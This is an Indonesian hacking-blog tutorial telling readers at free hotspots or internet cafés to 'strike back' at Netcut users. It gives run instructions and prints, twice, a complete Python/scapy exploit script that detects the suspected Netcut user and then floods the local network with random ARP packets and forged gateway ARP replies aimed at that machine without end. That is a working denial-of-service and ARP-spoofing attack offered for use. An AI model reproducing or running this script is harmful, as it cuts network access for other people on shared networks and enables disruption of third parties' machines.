Serang Balik Pengguna Netcut

9 March 2012
Penulis: c0d3HitLER   · Kategori Artikel: Tutorial

293

 

2

 

296

share

Salam BinusHacker,
Koneksi putus bukan menjadi sebuah dilema lagi, melainkan bisa dikarenakan beberapa sebab. Terutama di hotspot gratisan atau di warnet-warnet, kalau koneksi kita lemot dan tidak bisa akses internet dengan tidak normal, mungkin salah satunya karena ada pengguna warnet lainnya yang menggunakan NETCUT.
Jangan lupa untuk berkunjung ke forum binushacker untuk diskusi: https://www.facebook.com/groups/binushacker/
Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut.
Langkahnya adalah:

1. Harus sudah terdapat python compiler di komputer
2. Download toolsnya disini: http://1337day.com/exploits/17338
3. Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 A1:B2:C3:D4:E5:F6

Code exploitnya adalah sebagai berikut:

Python

#!/usr/bin/env python #Exploit Title: Netcut Denial of Service Vulnerability #Author: MaYaSeVeN #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com) #Blog: http://mayaseven.blogspot.com #PoC: Video http://www.youtube.com/user/mayaseven #Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png #Version: Netcut 2 #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266 #Tested on: Windows Xp, Windows 7 #Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf import commands,os,sys #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2] gw_ip = commands.getoutput("ip route list | grep default").split()[2] def protect(gw_ip,gw_mac): os.popen("arp -s %s %s" %(gw_ip,gw_mac)) print "Protected himself" def detect(): ans = sniff(filter='arp',timeout=7) target=[] for r in ans.res: target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%")) return target def preattack(gw_ip): num = [] count = 0 target = 0 temp = 0 print "Detecting..." d = detect() for i in range(len(d)): if d[i].split()[0] == "255.255.255.255": num.append(d.count(d[i])) if d.count(d[i]) > count: count = d.count(d[i]) target = i if d[i].split()[0] == gw_ip: temp += 1 if len(d) < 7: print "[-] No one use Netcut or try again" exit() if len(num)*7 < temp: num[:] = [] count = 0 result = float(temp)/len(d)*100 for j in range(len(d)): if d[i].split()[0] == gw_ip: num.append(d.count(d[j])) if d.count(d[i]) > count: count = d.count(d[i]) target = i num.reverse() result = float(temp)/len(d)*100 print target else: num.reverse() result = float(num[0]+temp)/len(d)*100 print "There is a possibility that " + str(result) + "%" if result>= 50: target_mac = d[target].split()[1] target_ip = d[target].split()[2] print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac) attack(target_mac,target_ip,gw_ip) else: print "[-] No one use Netcut or try again" def attack(target_mac,target_ip,gw_ip): print "[+]Counter Attack !!!" e = Ether(dst="FF:FF:FF:FF:FF:FF") while 1: a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1) p = e/a/Padding("\x00"*18) sendp(p,verbose=0) a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2) p1 = e/a1/Padding("\x00"*18) sendp(p1,verbose=0) if __name__ == '__main__': os.system("clear") print "###################################################" print " __ __ __ __ _____ __ __ _ _" print "| \/ | \ \ / / / ____| \ \ / / | \ | |" print "| \ / | __ \ \_/ /_ _| (___ __\ \ / /__| \| |" print "| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |" print "| | | | (_| || | (_| |____) | __/\ / __/ |\ |" print "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|" print " " print "###################################################" print "" print "http://mayaseven.blogspot.com" print "" if len(sys.argv) == 2 or len(sys.argv) == 3: if len(sys.argv) == 2: conf.iface=sys.argv[1] preattack(gw_ip) if len(sys.argv) == 3: conf.iface=sys.argv[1] gw_mac = sys.argv[2] protect(gw_ip,gw_mac) preattack(gw_ip) else: print '''Mode: 1.)Attack only Usage: NetcutKiller <Interface> e.g. NetcutKiller.py wlan0 2.)Attack with protect himself Usage: NetcutKiller <Interface> <MAC_Gateway> e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF ''' # 1337day.com [2012-01-04]

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120

#!/usr/bin/env python #Exploit Title: Netcut Denial of Service Vulnerability #Author: MaYaSeVeN #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com) #Blog: http://mayaseven.blogspot.com #PoC: Video http://www.youtube.com/user/mayaseven #Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png #Version: Netcut 2 #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266 #Tested on: Windows Xp, Windows 7 #Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf import commands,os,sys #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2] gw_ip = commands.getoutput("ip route list | grep default").split()[2] def protect(gw_ip,gw_mac): os.popen("arp -s %s %s" %(gw_ip,gw_mac)) print "Protected himself" def detect(): ans = sniff(filter='arp',timeout=7) target=[] for r in ans.res: target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%")) return target def preattack(gw_ip): num = [] count = 0 target = 0 temp = 0 print "Detecting..." d = detect() for i in range(len(d)): if d[i].split()[0] == "255.255.255.255": num.append(d.count(d[i])) if d.count(d[i]) > count: count = d.count(d[i]) target = i if d[i].split()[0] == gw_ip: temp += 1 if len(d) < 7: print "[-] No one use Netcut or try again" exit() if len(num)*7 < temp: num[:] = [] count = 0 result = float(temp)/len(d)*100 for j in range(len(d)): if d[i].split()[0] == gw_ip: num.append(d.count(d[j])) if d.count(d[i]) > count: count = d.count(d[i]) target = i num.reverse() result = float(temp)/len(d)*100 print target else: num.reverse() result = float(num[0]+temp)/len(d)*100 print "There is a possibility that " + str(result) + "%" if result>= 50: target_mac = d[target].split()[1] target_ip = d[target].split()[2] print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac) attack(target_mac,target_ip,gw_ip) else: print "[-] No one use Netcut or try again" def attack(target_mac,target_ip,gw_ip): print "[+]Counter Attack !!!" e = Ether(dst="FF:FF:FF:FF:FF:FF") while 1: a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1) p = e/a/Padding("\x00"*18) sendp(p,verbose=0) a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2) p1 = e/a1/Padding("\x00"*18) sendp(p1,verbose=0) if __name__ == '__main__': os.system("clear") print "###################################################" print " __ __ __ __ _____ __ __ _ _" print "| \/ | \ \ / / / ____| \ \ / / | \ | |" print "| \ / | __ \ \_/ /_ _| (___ __\ \ / /__| \| |" print "| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |" print "| | | | (_| || | (_| |____) | __/\ / __/ |\ |" print "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|" print " " print "###################################################" print "" print "http://mayaseven.blogspot.com" print "" if len(sys.argv) == 2 or len(sys.argv) == 3: if len(sys.argv) == 2: conf.iface=sys.argv[1] preattack(gw_ip) if len(sys.argv) == 3: conf.iface=sys.argv[1] gw_mac = sys.argv[2] protect(gw_ip,gw_mac) preattack(gw_ip) else: print '''Mode: 1.)Attack only Usage: NetcutKiller <Interface> e.g. NetcutKiller.py wlan0 2.)Attack with protect himself Usage: NetcutKiller <Interface> <MAC_Gateway> e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF ''' # 1337day.com [2012-01-04]

Untuk lebih detailnya, simak video berikut:
Oke all, selamat mencoba dan semoga berhasil
Jangan lupa untuk berkunjung ke forum binushacker untuk diskusi: https://www.facebook.com/groups/binushacker/